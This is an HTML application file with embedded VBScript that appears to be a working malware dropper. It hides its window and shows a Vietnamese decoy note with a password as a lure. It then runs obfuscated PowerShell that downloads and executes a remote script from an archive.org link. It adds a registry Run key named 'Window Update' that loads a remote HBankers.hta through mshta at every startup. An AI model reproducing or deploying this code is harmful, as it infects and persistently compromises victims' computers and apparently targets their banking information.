<HTML>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<HEAD>
<script language="VBScript">
Window.ReSizeTo 0, 0
Window.moveTo -3000,-3000
Set oShell = CreateObject("WScript.Shell")
FileName = oShell.ExpandEnvironmentStrings("%Temp%\MaGiaiNenNe.txt")
Set oShell = Nothing 'Tidy up the Objects we no longer need
Set fso = CreateObject("Scripting.FileSystemObject")
Set oFile = fso.CreateTextFile(FileName,true,true)
oFile.WriteLine "Do s
thi qu
n team m
nh 1 file"
oFile.WriteLine "c
t data n
m theo c
m cho team nh
oFile.WriteLine "Ch
n thi v
oFile.WriteLine "M
: Y6D93CRG"
oFile.Close
Set oFile = Nothing 'Tidy up the Objects we no longer need
Set fso = Nothing 'Tidy up the Objects we no longer need
CreateObject("WScript.Shell").Run(FileName)
Dim XRTFYGUHIYRDTYFUGHI
Set XRTFYGUHIYRDTYFUGHI= CreateObject("WScript.Shell")
XGRCHTVJYBKUNLI="pow"
GRHTFJYGKUHLIJ="ers"
ESRDGHTFYJGUKHILJ="hell"
GRDHTFYGUHIJO = " $A='DowRing'.Replace('R','nloadstr');"
FBCTFYGUGYFTD ="$B = 'WebCAMt'.Replace('AM','lien');"
ESGRDHTFJGYUH = "$d='tnt'.Replace('tn','Ne');$link ='https://ia601400.us.archive.org/31/items/bypass_20210428_0905/bypass.txt';"
CYYTURDHTC ="$t1='(New-OS'.Replace('S','bje');$t2='ct Sypek)'.Replace('pe','stem.$d.$B).$A($lin');$WC=I`E`X ($t1,$t2 -Join '')|I`E`X"
OK = XGRCHTVJYBKUNLI+GRHTFJYGKUHLIJ+ESRDGHTFYJGUKHILJ+GRDHTFYGUHIJO++FBCTFYGUGYFTD+ESGRDHTFJGYUH+CYYTURDHTC+" "
XRTFYGUHIYRDTYFUGHI.Run OK,0
self.close
On Error Resume Next
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegWrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Window Update","C:\Windows\System32\mshta.exe https://archive.org/download/hbankers_20210428_1011/HBankers.hta --auto-launch-at-startup","REG_SZ"
</script>
<body>
</body>
</HEAD>
</HTML>